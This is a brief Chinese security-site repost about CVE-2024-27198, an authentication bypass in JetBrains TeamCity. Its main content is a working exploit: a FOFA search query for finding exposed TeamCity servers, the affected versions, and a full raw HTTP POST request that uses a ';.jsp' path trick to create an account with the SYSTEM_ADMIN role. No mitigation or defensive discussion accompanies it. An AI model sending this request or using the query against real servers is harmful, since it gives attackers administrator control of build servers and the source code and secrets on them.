JetBrains TeamCity (CVE-2024-27198)

admin 2024年3月8日23:41:00评论11 views字数 569阅读1分53秒阅读模式


fofa语法

body="Log in to TeamCity"app="JET_BRAINS-TeamCity"


JetBrains TeamCity (CVE-2024-27198)

影响版本

TeamCity(On-Premises)< 2023.11.4

JetBrains TeamCity (CVE-2024-27198)

漏洞复现

POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1Host: XXX.XX.XXXContent-Length: 129Accept: text/javascript, text/html, application/xml, text/xml, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Content-Type: application/jsonAccept-Encoding: gzip, deflate
{"username": "NAME", "password": "PASSWORD", "email": "[email protected]","roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

JetBrains TeamCity (CVE-2024-27198)


原文始发于微信公众号(破晓信安):JetBrains TeamCity (CVE-2024-27198)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月8日23:41:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JetBrains TeamCity (CVE-2024-27198)https://cn-sec.com/archives/2561640.html

发表评论

匿名网友 填写信息